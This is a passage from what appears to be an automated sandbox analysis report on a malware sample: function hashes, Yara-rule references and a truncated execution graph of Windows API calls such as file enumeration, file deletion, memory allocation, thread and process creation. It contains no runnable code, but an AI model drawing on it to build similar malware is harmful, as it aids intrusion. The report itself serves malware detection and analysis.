                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: 75a7cbe811a1e538eda10fddcd41e9e720cd04c8cec42477c535a6451f9996be
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 3D919070E082169EDF24DF69CD81ABFB7B5AF46720F64451AE855E72C0EB349E40CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00A69126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: 35b563f713f54dad6c2a6cb5c4acc219b9a829371a26eca6a58016126c7c47f1
                                                                                                                        • Instruction ID: 849e5cd030550ecbdcae0f95db62a255e6bb42518c6098bdf316a8698914e182
                                                                                                                        • Opcode Fuzzy Hash: 35b563f713f54dad6c2a6cb5c4acc219b9a829371a26eca6a58016126c7c47f1
                                                                                                                        • Instruction Fuzzy Hash: F1812871D002699BDB31DB54CD45BEEB7B8AF48710F1181EAA90DB7290E7309E84CFA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:3.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:2.2%
                                                                                                                        Signature Coverage:1.3%
                                                                                                                        Total number of Nodes:903
                                                                                                                        Total number of Limit Nodes:104
                                                                                                                        execution_graph 88946 2940714 88948 29406cb 88946->88948 88947 294076c 88948->88947 88951 29435a0 88948->88951 88950 2940770 88952 29435fd 88951->88952 88953 2943634 88952->88953 88956 293fe80 88952->88956 88953->88950 88955 2943616 88955->88950 88957 293fe0e 88956->88957 88958 293fe8c 88956->88958 88961 2946c90 88957->88961 88960 293fe31 88960->88955 88964 2945040 88961->88964 88963 2946cc1 88963->88960 88965 2945061 88964->88965 88966 29450a6 88964->88966 88967 2945f10 LdrLoadDll 88965->88967 88971 2945f10 88966->88971 88969 294507e 88967->88969 88969->88963 88970 29450bc NtAllocateVirtualMemory 88970->88963 88972 2945f1f 88971->88972 88974 2945f85 88971->88974 88972->88974 88975 2940900 88972->88975 88974->88970 88976 294091a 88975->88976 88977 294090e 88975->88977 88976->88974 88977->88976 88980 2940d80 LdrLoadDll 88977->88980 88979 2940a6c 88979->88974 88980->88979 88981 293c150 88982 293c172 88981->88982 89012 29341e0 88982->89012 88984 293c363 88985 29341e0 LdrLoadDll 88984->88985 88986 293c388 88985->88986 89017 2934120 88986->89017 88988 293c39c 89021 293c010 88988->89021 88991 293c010 6 API calls 88992 293c412 88991->88992 88993 293c010 6 API calls 88992->88993 88994 293c42a 88993->88994 88995 293c010 6 API calls 88994->88995 88996 293c442 88995->88996 88997 293c010 6 API calls 88996->88997 88998 293c45d 88997->88998 88999 293c010 6 API calls 88998->88999 89000 293c475 88999->89000 89001 293c48f 89000->89001 89002 293c010 6 API calls 89000->89002 89003 293c4c3 89002->89003 89004 293c010 6 API calls 89003->89004 89005 293c500 89004->89005 89006 293c010 6 API calls 89005->89006 89007 293c53d 89006->89007 89008 293c010 6 API calls 89007->89008 89009 293c57a 89008->89009 89010 293c010 6 API calls 89009->89010 89011 293c5b7 89010->89011 89013 2934205 89012->89013 89014 2934120 LdrLoadDll 89013->89014 89016 2934210 89013->89016 89015 2934258 89014->89015 89015->88984 89016->88984 89018 2934144 89017->89018 89035 2944110 LdrLoadDll 89018->89035 89020 293417e 89020->88988 89022 293c039 89021->89022 89023 2940900 LdrLoadDll 89022->89023 89024 293c079 89023->89024 89025 2940900 LdrLoadDll 89024->89025 89026 293c097 89025->89026 89027 2940900 LdrLoadDll 89026->89027 89029 293c0b9 89027->89029 89028 293c13d 89028->88991 89029->89028 89030 293c0e3 FindFirstFileW 89029->89030 89030->89028 89034 293c0fe 89030->89034 89031 293c124 FindNextFileW 89032 293c136 FindClose 89031->89032 89031->89034 89032->89028 89034->89031 89036 293bf20 6 API calls 89034->89036 89035->89020 89036->89034 89037 2944e90 89038 2944edf 89037->89038 89039 2944eae 89037->89039 89040 2945f10 LdrLoadDll 89038->89040 89041 2945f10 LdrLoadDll 89039->89041 89042 2944ef5 NtDeleteFile 89040->89042 89043 2944ecb 89041->89043 89044 29442d0 89045 2944326 89044->89045 89046 29442f1 89044->89046 89048 2945f10 LdrLoadDll 89045->89048 89047 2945f10 LdrLoadDll 89046->89047 89049 294430e 89047->89049 89050 294433c 89048->89050 89053 33439b0 LdrInitializeThunk 89050->89053 89051 294434b 89053->89051 89064 2943c10 89065 2943c6a 89064->89065 89067 2943c77 89065->89067 89068 29421c0 89065->89068 89069 29421d4 89068->89069 89070 2946c90 2 API calls 89069->89070 89071 2942201 89070->89071 89076 2942306 89071->89076 89078 2933f00 89071->89078 89073 2942247 89074 2940900 LdrLoadDll 89073->89074 89077 294226c 89074->89077 89075 2942280 Sleep 89075->89077 89076->89067 89077->89075 89077->89076 89079 2933f24 89078->89079 89080 2933f60 LdrLoadDll 89079->89080 89081 2933f2b 89079->89081 89080->89081 89081->89073 89093 2938901 89101 2938910 89093->89101 89094 2938917 89095 2940900 LdrLoadDll 89095->89101 89096 29389ff GetFileAttributesW 89096->89101 89097 2938baa 89098 2938bc3 89097->89098 89112 2946d20 89097->89112 89100 29341e0 LdrLoadDll 89100->89101 89101->89094 89101->89095 89101->89096 89101->89097 89101->89100 89105 293c5d0 89101->89105 89110 29417d0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 89101->89110 89111 2941680 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 89101->89111 89107 293c5e6 89105->89107 89106 293c5f3 89106->89101 89107->89106 89108 2946d20 2 API calls 89107->89108 89109 293c62c 89108->89109 89109->89101 89110->89101 89111->89101 89115 2945210 89112->89115 89114 2946d39 89114->89098 89116 294522a 89115->89116 89117 2945f10 LdrLoadDll 89116->89117 89118 294523b RtlFreeHeap 89117->89118 89118->89114 89119 2929940 89120 292994f 89119->89120 89121 2940900 LdrLoadDll 89120->89121 89122 292996a 89121->89122 89123 2929990 89122->89123 89124 292997d CreateThread 89122->89124 89125 2936480 89126 29364ae 89125->89126 89132 2936f60 89126->89132 89128 29364d6 89129 29364dd 89128->89129 89139 2946e40 LdrLoadDll RtlAllocateHeap 89128->89139 89131 29364ed 89133 2936f7d 89132->89133 89140 2944730 89133->89140 89135 2936fcd 89136 2936fd4 89135->89136 89149 29447e0 89135->89149 89136->89128 89138 2936ffd 89138->89128 89139->89131 89141 2944797 89140->89141 89142 294474e 89140->89142 89143 2945f10 LdrLoadDll 89141->89143 89144 2945f10 LdrLoadDll 89142->89144 89145 29447ad 89143->89145 89146 294476b 89144->89146 89158 3342f30 LdrInitializeThunk 89145->89158 89146->89135 89147 29447d0 89147->89135 89150 2944856 89149->89150 89151 2944801 89149->89151 89152 2945f10 LdrLoadDll 89150->89152 89153 2945f10 LdrLoadDll 89151->89153 89154 294486c 89152->89154 89155 294481e 89153->89155 89159 3342d10 LdrInitializeThunk 89154->89159 89155->89138 89156 294489b 89156->89138 89158->89147 89159->89156 89160 293e5c0 89161 293e624 89160->89161 89162 29341e0 LdrLoadDll 89161->89162 89163 293e717 89162->89163 89194 29359f0 89163->89194 89165 293e754 89166 293e74d 89166->89165 89167 29341e0 LdrLoadDll 89166->89167 89168 293e790 89167->89168 89205 2935b00 89168->89205 89170 293e8f3 89171 293e7d0 89171->89170 89172 293e902 89171->89172 89209 293e3a0 89171->89209 89173 2944f10 2 API calls 89172->89173 89175 293e90c 89173->89175 89176 293e805 89176->89172 89177 293e810 89176->89177 89238 2946e00 89177->89238 89179 293e839 89180 293e842 89179->89180 89181 293e858 89179->89181 89182 2944f10 2 API calls 89180->89182 89241 293e290 CoInitialize 89181->89241 89184 293e84c 89182->89184 89185 293e866 89243 2944a50 89185->89243 89187 293e8e2 89249 2944f10 89187->89249 89189 293e8ec 89191 2946d20 2 API calls 89189->89191 89191->89170 89192 293e884 89192->89187 89193 2944a50 2 API calls 89192->89193 89253 293e1c0 LdrLoadDll RtlFreeHeap 89192->89253 89193->89192 89195 2935a23 89194->89195 89254 2944ab0 89195->89254 89198 2935a47 89198->89166 89202 2935a82 89203 2944f10 2 API calls 89202->89203 89204 2935aea 89203->89204 89204->89166 89206 2935b25 89205->89206 89269 29448e0 89206->89269 89210 293e3bc 89209->89210 89211 2933f00 LdrLoadDll 89210->89211 89213 293e3da 89211->89213 89212 293e3e3 89212->89176 89213->89212 89214 2940900 LdrLoadDll 89213->89214 89215 293e400 89214->89215 89216 2940900 LdrLoadDll 89215->89216 89217 293e41b 89216->89217 89218 2940900 LdrLoadDll 89217->89218 89219 293e434 89218->89219 89220 2940900 LdrLoadDll 89219->89220 89221 293e450 89220->89221 89222 2940900 LdrLoadDll 89221->89222 89223 293e469 89222->89223 89224 2940900 LdrLoadDll 89223->89224 89225 293e482 89224->89225 89226 2933f00 LdrLoadDll 89225->89226 89228 293e4ae 89226->89228 89227 293e55d 89227->89176 89228->89227 89229 2940900 LdrLoadDll 89228->89229 89230 293e4d3 89229->89230 89231 2933f00 LdrLoadDll 89230->89231 89232 293e508 89231->89232 89232->89227 89233 2940900 LdrLoadDll 89232->89233 89234 293e52b 89233->89234 89235 2940900 LdrLoadDll 89234->89235 89236 293e544 89235->89236 89237 2940900 LdrLoadDll 89236->89237 89237->89227 89276 29451c0 89238->89276 89240 2946e1b 89240->89179 89242 293e2f5 89241->89242 89242->89185 89244 2944a6d 89243->89244 89245 2945f10 LdrLoadDll 89244->89245 89246 2944a7e 89245->89246 89281 3342ba0 LdrInitializeThunk 89246->89281 89247 2944a9d 89247->89192 89250 2944f2a 89249->89250 89251 2945f10 LdrLoadDll 89250->89251 89252 2944f3b NtClose 89251->89252 89252->89189 89253->89192 89255 2944aca 89254->89255 89256 2945f10 LdrLoadDll 89255->89256 89257 2935a40 89256->89257 89257->89198 89258 2944b00 89257->89258 89259 2944b1d 89258->89259 89260 2945f10 LdrLoadDll 89259->89260 89261 2944b2e 89260->89261 89268 3342ca0 LdrInitializeThunk 89261->89268 89262 2935a6a 89262->89198 89264 2945410 89262->89264 89265 294542a 89264->89265 89266 2945f10 LdrLoadDll 89265->89266 89267 294543b 89266->89267 89267->89202 89268->89262 89270 29448fd 89269->89270 89271 2945f10 LdrLoadDll 89270->89271 89272 294490e 89271->89272 89275 3342c60 LdrInitializeThunk 89272->89275 89273 2935b99 89273->89171 89275->89273 89277 29451dd 89276->89277 89278 2945f10 LdrLoadDll 89277->89278 89279 29451ee RtlAllocateHeap 89278->89279 89280 2945203 89279->89280 89280->89240 89281->89247 89284 2939c30 89289 2939960 89284->89289 89286 2939c3d 89309 2939600 89286->89309 89288 2939c43 89290 2939985 89289->89290 89291 29341e0 LdrLoadDll 89290->89291 89292 2939a15 89291->89292 89293 29341e0 LdrLoadDll 89292->89293 89294 2939a74 89293->89294 89321 2937380 89294->89321 89297 2939ac2 89297->89286 89299 2939ad9 89299->89286 89300 2939ad0 89300->89299 89301 29341e0 LdrLoadDll 89300->89301 89302 2939b39 89301->89302 89304 2939bc1 89302->89304 89364 2939060 89302->89364 89305 2939c19 89304->89305 89373 29393c0 89304->89373 89307 2946d20 2 API calls 89305->89307 89308 2939c20 89307->89308 89308->89286 89310 2939616 89309->89310 89313 2939621 89309->89313 89311 2946e00 2 API calls 89310->89311 89311->89313 89312 2939637 89312->89288 89313->89312 89314 2937380 2 API calls 89313->89314 89315 293992e 89313->89315 89318 29341e0 LdrLoadDll 89313->89318 89319 2939060 3 API calls 89313->89319 89320 29393c0 2 API calls 89313->89320 89314->89313 89316 2939947 89315->89316 89317 2946d20 2 API calls 89315->89317 89316->89288 89317->89316 89318->89313 89319->89313 89320->89313 89322 2940900 LdrLoadDll 89321->89322 89323 29373a1 89322->89323 89324 29373a8 GetFileAttributesW 89323->89324 89325 29373b3 89323->89325 89324->89325 89325->89297 89326 2941aa0 89325->89326 89327 2941aae 89326->89327 89328 2941ab5 89326->89328 89327->89300 89329 2933f00 LdrLoadDll 89328->89329 89330 2941aea 89329->89330 89331 2941af9 89330->89331 89377 2941580 LdrLoadDll 89330->89377 89333 2946e00 2 API calls 89331->89333 89335 2941cef 89331->89335 89334 2941b12 89333->89334 89334->89335 89336 2941b27 89334->89336 89337 2941c9a 89334->89337 89335->89300 89378 293c6f0 LdrLoadDll 89336->89378 89338 2941ca4 89337->89338 89339 2941c2c 89337->89339 89379 293c6f0 LdrLoadDll 89338->89379 89342 2946d20 2 API calls 89339->89342 89363 2941c91 89339->89363 89342->89335 89343 2941b3e 89347 2940900 LdrLoadDll 89343->89347 89344 2941cbb 89380 2940e50 LdrLoadDll 89344->89380 89346 2941cd1 89349 2940900 LdrLoadDll 89346->89349 89348 2941b5a 89347->89348 89350 2940900 LdrLoadDll 89348->89350 89349->89335 89351 2941b76 89350->89351 89352 2940900 LdrLoadDll 89351->89352 89353 2941b95 89352->89353 89354 2940900 LdrLoadDll 89353->89354 89355 2941bb1 89354->89355 89356 2940900 LdrLoadDll 89355->89356 89357 2941bcd 89356->89357 89358 2940900 LdrLoadDll 89357->89358 89359 2941bec 89358->89359 89360 2940900 LdrLoadDll 89359->89360 89361 2941c08 89360->89361 89362 2940900 LdrLoadDll 89361->89362 89362->89339 89363->89300 89365 2939086 89364->89365 89366 293c5d0 2 API calls 89365->89366 89367 29390ed 89366->89367 89369 293910b 89367->89369 89370 293926a 89367->89370 89368 293924f 89368->89302 89369->89368 89381 2938f30 89369->89381 89370->89368 89371 2938f30 3 API calls 89370->89371 89371->89370 89374 29393e6 89373->89374 89375 293c5d0 2 API calls 89374->89375 89376 2939462 89375->89376 89376->89304 89377->89331 89378->89343 89379->89344 89380->89346 89382 2938f46 89381->89382 89385 293cad0 89382->89385 89384 293904e 89384->89369 89386 293cb0d 89385->89386 89387 293cbbd 89386->89387 89389 293cb60 89386->89389 89392 293dbc0 89386->89392 89387->89384 89390 293cb99 89389->89390 89391 2946d20 2 API calls 89389->89391 89390->89384 89391->89390 89395 293d8d0 89392->89395 89394 293dbd4 89394->89389 89396 293d8f6 89395->89396 89398 2946c90 2 API calls 89396->89398 89399 293d916 89396->89399 89397 293dbb2 89397->89394 89398->89399 89399->89397 89400 29341e0 LdrLoadDll 89399->89400 89407 293d9fe 89399->89407 89401 293da7a 89400->89401 89402 29341e0 LdrLoadDll 89401->89402 89402->89407 89403 293db94 89405 2946d20 2 API calls 89403->89405 89406 293dba4 89405->89406 89406->89394 89407->89397 89407->89403 89408 292b380 89407->89408 89409 2946c90 2 API calls 89408->89409 89410 292c9f1 89409->89410 89410->89403 89411 293b1b0 89412 293b1d8 89411->89412 89413 2946e00 2 API calls 89412->89413 89415 293b238 89413->89415 89414 293b241 89415->89414 89442 293a510 89415->89442 89417 293b26a 89418 293b28a 89417->89418 89472 293a860 LdrLoadDll 89417->89472 89420 293b2a8 89418->89420 89474 293d040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 89418->89474 89423 293b2c2 89420->89423 89476 2934050 LdrLoadDll 89420->89476 89421 293b278 89421->89418 89473 293aee0 LdrLoadDll RtlFreeHeap 89421->89473 89428 293a510 4 API calls 89423->89428 89424 293b29c 89475 293d040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 89424->89475 89429 293b2ef 89428->89429 89430 293b310 89429->89430 89477 293a860 LdrLoadDll 89429->89477 89432 293b32e 89430->89432 89479 293d040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 89430->89479 89433 293b348 89432->89433 89481 2934050 LdrLoadDll 89432->89481 89438 2946d20 2 API calls 89433->89438 89434 293b2fe 89434->89430 89478 293aee0 LdrLoadDll RtlFreeHeap 89434->89478 89436 293b322 89480 293d040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 89436->89480 89440 293b352 89438->89440 89443 293a5a8 89442->89443 89444 29341e0 LdrLoadDll 89443->89444 89445 293a66e 89444->89445 89446 29341e0 LdrLoadDll 89445->89446 89447 293a69a 89446->89447 89448 2935b00 2 API calls 89447->89448 89449 293a6bf 89448->89449 89450 293a809 89449->89450 89490 29449a0 89449->89490 89452 293a81d 89450->89452 89482 2939e80 89450->89482 89452->89417 89455 293a7ff 89456 2944f10 2 API calls 89455->89456 89456->89450 89457 293a6f8 89458 2944f10 2 API calls 89457->89458 89459 293a732 89458->89459 89496 2946ee0 LdrLoadDll 89459->89496 89461 293a76b 89461->89452 89462 2935b00 2 API calls 89461->89462 89463 293a791 89462->89463 89463->89452 89464 29449a0 2 API calls 89463->89464 89465 293a7b6 89464->89465 89466 293a7e9 89465->89466 89467 293a7bd 89465->89467 89468 2944f10 2 API calls 89466->89468 89469 2944f10 2 API calls 89467->89469 89470 293a7f3 89468->89470 89471 293a7c7 89469->89471 89470->89417 89471->89417 89472->89421 89473->89418 89474->89424 89475->89420 89476->89423 89477->89434 89478->89430 89479->89436 89480->89432 89481->89433 89483 2939ea5 89482->89483 89484 29341e0 LdrLoadDll 89483->89484 89485 2939f87 89484->89485 89486 29341e0 LdrLoadDll 89485->89486 89487 2939fbf 89486->89487 89488 29341e0 LdrLoadDll 89487->89488 89489 293a07e 89487->89489 89488->89489 89489->89452 89491 29449bd 89490->89491 89492 2945f10 LdrLoadDll 89491->89492 89493 29449ce 89492->89493 89497 3342be0 LdrInitializeThunk 89493->89497 89494 293a6ed 89494->89455 89494->89457 89496->89461 89497->89494 89498 29407f0 89503 29407ff 89498->89503 89499 294088c 89500 2940846 89501 2946d20 2 API calls 89500->89501 89502 2940856 89501->89502 89503->89499 89503->89500 89504 2940887 89503->89504 89505 2946d20 2 API calls 89504->89505 89505->89499 89506 3342ad0 LdrInitializeThunk 89507 2944d70 89508 2944d8d 89507->89508 89509 2945f10 LdrLoadDll 89508->89509 89510 2944d9e 89509->89510 89513 3342af0 LdrInitializeThunk 89510->89513 89511 2944dc9 89513->89511 89514 29322ff 89515 29359f0 3 API calls 89514->89515 89516 2932323 89515->89516 89517 2932c7c 89525 2936dc0 89517->89525 89520 2932cba 89521 2932ca1 89535 292f700 LdrLoadDll 89521->89535 89522 2944f10 2 API calls 89522->89521 89524 2932cab 89526 2932c8c 89525->89526 89527 2936dda 89525->89527 89526->89520 89526->89521 89526->89522 89528 29341e0 LdrLoadDll 89527->89528 89529 2936e1f 89528->89529 89536 2944690 89529->89536 89531 2936e64 89540 29446e0 89531->89540 89534 2944f10 2 API calls 89534->89526 89535->89524 89537 29446ad 89536->89537 89538 2945f10 LdrLoadDll 89537->89538 89539 29446be 89538->89539 89539->89531 89541 29446fd 89540->89541 89542 2945f10 LdrLoadDll 89541->89542 89543 294470e 89542->89543 89546 33435c0 LdrInitializeThunk 89543->89546 89544 2936eaa 89544->89534 89546->89544 89547 29299a0 89549 2929d27 89547->89549 89550 292a231 89549->89550 89551 29469b0 89549->89551 89552 29469d6 89551->89552 89559 2932e30 89552->89559 89554 29469e2 89555 2946a10 89554->89555 89562 2943250 89554->89562 89566 2945260 LdrLoadDll 89555->89566 89558 2946a21 89558->89550 89567 2932d80 89559->89567 89561 2932e3d 89561->89554 89563 29432aa 89562->89563 89565 29432b7 89563->89565 89601 2931d00 89563->89601 89565->89555 89566->89558 89574 2941db0 89567->89574 89571 2932da3 89573 2932db0 89571->89573 89581 29458a0 89571->89581 89573->89561 89575 2941dbf 89574->89575 89576 2940900 LdrLoadDll 89575->89576 89577 2932d97 89576->89577 89578 2941e10 89577->89578 89588 2945180 89578->89588 89583 29458b8 89581->89583 89582 29458dc 89582->89573 89583->89582 89592 2944640 89583->89592 89586 2946d20 2 API calls 89587 294594a 89586->89587 89587->89573 89589 294519a 89588->89589 89590 2945f10 LdrLoadDll 89589->89590 89591 2941e2d 89590->89591 89591->89571 89593 294465d 89592->89593 89594 2945f10 LdrLoadDll 89593->89594 89595 294466e 89594->89595 89598 3342c0a 89595->89598 89596 2944689 89596->89586 89599 3342c11 89598->89599 89600 3342c1f LdrInitializeThunk 89598->89600 89599->89596 89600->89596 89602 2931d38 89601->89602 89619 2936ed0 89602->89619 89604 2931d40 89605 2931f99 89604->89605 89606 2946e00 2 API calls 89604->89606 89605->89565 89607 2931d56 89606->89607 89608 2946e00 2 API calls 89607->89608 89609 2931d64 89608->89609 89610 2946e00 2 API calls 89609->89610 89611 2931d75 89610->89611 89631 2935540 89611->89631 89613 2931dda 89618 2931e02 89613->89618 89661 2936140 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 89613->89661 89615 2931d82 89615->89613 89660 29356c0 LdrLoadDll 89615->89660 89641 2931810 89618->89641 89620 2936efc 89619->89620 89662 2934290 89620->89662 89622 2936f0e 89623 2936dc0 3 API calls 89622->89623 89624 2936f1f 89623->89624 89625 2936f41 89624->89625 89626 2936f29 89624->89626 89628 2936f52 89625->89628 89630 2944f10 2 API calls 89625->89630 89627 2936f34 89626->89627 89629 2944f10 2 API calls 89626->89629 89627->89604 89628->89604 89629->89627 89630->89628 89632 2935556 89631->89632 89633 2935560 89631->89633 89632->89615 89634 29341e0 LdrLoadDll 89633->89634 89635 29355f9 89634->89635 89636 2934120 LdrLoadDll 89635->89636 89638 293560d 89636->89638 89637 2935633 89637->89615 89638->89637 89639 29341e0 LdrLoadDll 89638->89639 89640 293565a 89639->89640 89640->89615 89666 2937190 89641->89666 89643 293182a 89653 2931cf5 89643->89653 89672 293fe10 89643->89672 89646 2931a2e 89680 2947f30 89646->89680 89648 2931888 89648->89653 89675 2947e00 89648->89675 89649 2931a43 89656 2931a59 89649->89656 89686 292fff0 89649->89686 89650 292fff0 4 API calls 89650->89656 89653->89605 89654 2931b10 89654->89656 89699 29302b0 89654->89699 89656->89650 89656->89653 89658 29302b0 2 API calls 89656->89658 89703 2937130 89656->89703 89657 2937130 LdrLoadDll LdrInitializeThunk 89659 2931b89 89657->89659 89658->89656 89659->89656 89659->89657 89660->89613 89661->89618 89663 29342d6 89662->89663 89664 2934120 LdrLoadDll 89663->89664 89665 2934369 89664->89665 89665->89622 89667 293719d 89666->89667 89668 2940900 LdrLoadDll 89667->89668 89669 29371b7 89668->89669 89670 29371c5 89669->89670 89671 29371be SetErrorMode 89669->89671 89670->89643 89671->89670 89673 2946c90 2 API calls 89672->89673 89674 293fe31 89672->89674 89673->89674 89674->89648 89676 2947e16 89675->89676 89677 2947e10 89675->89677 89678 2946e00 2 API calls 89676->89678 89677->89646 89679 2947e3c 89678->89679 89679->89646 89681 2947ea0 89680->89681 89682 2947efd 89681->89682 89683 2946e00 2 API calls 89681->89683 89682->89649 89684 2947eda 89683->89684 89685 2946d20 2 API calls 89684->89685 89685->89682 89687 2930000 89686->89687 89688 292fffb 89686->89688 89689 2946c90 2 API calls 89687->89689 89688->89654 89692 2930025 89689->89692 89690 293008c 89690->89654 89692->89690 89693 2930092 89692->89693 89697 2946c90 2 API calls 89692->89697 89707 29445f0 89692->89707 89713 2945130 89692->89713 89694 29300bc 89693->89694 89696 2945130 2 API calls 89693->89696 89694->89654 89698 29300ad 89696->89698 89697->89692 89698->89654 89700 29302cc 89699->89700 89701 2945130 2 API calls 89700->89701 89702 29302d2 89701->89702 89702->89659 89704 2937143 89703->89704 89721 2944570 89704->89721 89706 293716e 89706->89656 89708 294460a 89707->89708 89709 2945f10 LdrLoadDll 89708->89709 89710 294461b 89709->89710 89719 3342df0 LdrInitializeThunk 89710->89719 89711 2944632 89711->89692 89714 294514d 89713->89714 89715 2945f10 LdrLoadDll 89714->89715 89716 294515e 89715->89716 89720 3342c70 LdrInitializeThunk 89716->89720 89717 2945175 89717->89692 89719->89711 89720->89717 89722 29445c6 89721->89722 89723 2944591 89721->89723 89725 2945f10 LdrLoadDll 89722->89725 89724 2945f10 LdrLoadDll 89723->89724 89727 29445ae 89724->89727 89726 29445dc 89725->89726 89730 3342dd0 LdrInitializeThunk 89726->89730 89727->89706 89728 29445eb 89728->89706 89730->89728 89731 293eea0 89732 293eebd 89731->89732 89733 2933f00 LdrLoadDll 89732->89733 89734 293eedb 89733->89734 89735 2940900 LdrLoadDll 89734->89735 89752 293f0dc 89734->89752 89736 293ef08 89735->89736 89737 2940900 LdrLoadDll 89736->89737 89738 293ef21 89737->89738 89739 2940900 LdrLoadDll 89738->89739 89740 293ef3a 89739->89740 89741 2940900 LdrLoadDll 89740->89741 89742 293ef56 89741->89742 89743 2940900 LdrLoadDll 89742->89743 89744 293ef6f 89743->89744 89745 2940900 LdrLoadDll 89744->89745 89746 293ef88 89745->89746 89747 2940900 LdrLoadDll 89746->89747 89748 293efa4 89747->89748 89749 2940900 LdrLoadDll 89748->89749 89750 293efbd 89749->89750 89751 2940900 LdrLoadDll 89750->89751 89753 293efd5 89751->89753 89753->89752 89755 293ea60 LdrLoadDll 89753->89755 89755->89753 89756 2936620 89757 293663c 89756->89757 89761 293671c 89756->89761 89759 2944f10 2 API calls 89757->89759 89757->89761 89758 29367b2 89760 2936657 89759->89760 89770 2935c80 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 89760->89770 89761->89758 89771 2935c80 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 89761->89771 89763 293678c 89763->89758 89772 2935e50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 89763->89772 89765 293668c 89767 29341e0 LdrLoadDll 89765->89767 89768 29366b9 89767->89768 89769 29341e0 LdrLoadDll 89768->89769 89769->89761 89770->89765 89771->89763 89772->89758 89773 293f7a0 89774 293f7c8 89773->89774 89775 29341e0 LdrLoadDll 89774->89775 89776 293f802 89775->89776 89777 29359f0 3 API calls 89776->89777 89779 293f828 89777->89779 89778 293f82f 89779->89778 89780 29341e0 LdrLoadDll 89779->89780 89781 293f86b 89780->89781 89782 29341e0 LdrLoadDll 89781->89782 89783 293f8a0 89782->89783 89784 2935b00 2 API calls 89783->89784 89785 293f8c4 89784->89785 89786 293f906 89785->89786 89799 293fa9a 89785->89799 89802 293f4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 89785->89802 89788 29341e0 LdrLoadDll 89786->89788 89789 293f937 89788->89789 89790 2935b00 2 API calls 89789->89790 89793 293f95b 89790->89793 89791 293f9a1 89792 2935b00 2 API calls 89791->89792 89796 293f9d1 89792->89796 89793->89791 89793->89799 89803 293f4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 89793->89803 89795 293fa17 89798 2935b00 2 API calls 89795->89798 89796->89795 89796->89799 89804 293f4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 89796->89804 89800 293fa76 89798->89800 89800->89799 89805 293f4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 89800->89805 89802->89786 89803->89791 89804->89795 89805->89799 89806 29367e0 89807 29367f8 89806->89807 89811 2936852 89806->89811 89808 2939e80 LdrLoadDll 89807->89808 89807->89811 89809 293683c 89808->89809 89809->89811 89812 293a110 89809->89812 89813 293a136 89812->89813 89814 2940900 LdrLoadDll 89813->89814 89816 293a18a 89814->89816 89815 293a4fa 89815->89811 89816->89815 89859 29452a0 89816->89859 89818 293a1db 89819 293a4e2 89818->89819 89821 2947f30 3 API calls 89818->89821 89820 2946d20 2 API calls 89819->89820 89820->89815 89822 293a1f7 89821->89822 89822->89819 89823 293a2fd 89822->89823 89824 2944640 2 API calls 89822->89824 89867 2935220 89823->89867 89825 293a27e 89824->89825 89825->89823 89830 293a286 89825->89830 89828 293a2e3 89829 2946d20 2 API calls 89828->89829 89833 293a2f3 89829->89833 89830->89815 89830->89828 89831 293a2b2 89830->89831 89863 2935120 89830->89863 89836 2944f10 2 API calls 89831->89836 89832 293a35a 89838 293a4c1 89832->89838 89839 293a38a 89832->89839 89833->89811 89835 2935120 2 API calls 89835->89832 89837 293a2c2 89836->89837 89896 2942430 LdrLoadDll LdrInitializeThunk 89837->89896 89842 2946d20 2 API calls 89838->89842 89872 2944fa0 89839->89872 89843 293a4d8 89842->89843 89843->89811 89844 293a3a9 89845 2936f60 3 API calls 89844->89845 89846 293a412 89845->89846 89846->89819 89847 293a41d 89846->89847 89848 2946d20 2 API calls 89847->89848 89849 293a441 89848->89849 89881 29448a0 89849->89881 89852 29447e0 2 API calls 89853 293a47c 89852->89853 89854 293a483 89853->89854 89855 29448a0 2 API calls 89853->89855 89854->89811 89856 293a4a9 89855->89856 89887 2944450 89856->89887 89858 293a4b7 89858->89811 89860 29452bd 89859->89860 89861 2945f10 LdrLoadDll 89860->89861 89862 29452ce CreateProcessInternalW 89861->89862 89862->89818 89864 2935144 89863->89864 89865 29447e0 2 API calls 89864->89865 89866 293515e 89865->89866 89866->89831 89868 2944640 2 API calls 89867->89868 89869 2935256 89868->89869 89870 2944fa0 2 API calls 89869->89870 89871 293526b 89870->89871 89871->89819 89871->89832 89871->89835 89873 2944fc1 89872->89873 89874 2945002 89872->89874 89876 2945f10 LdrLoadDll 89873->89876 89875 2945f10 LdrLoadDll 89874->89875 89877 2945018 89875->89877 89878 2944fde 89876->89878 89897 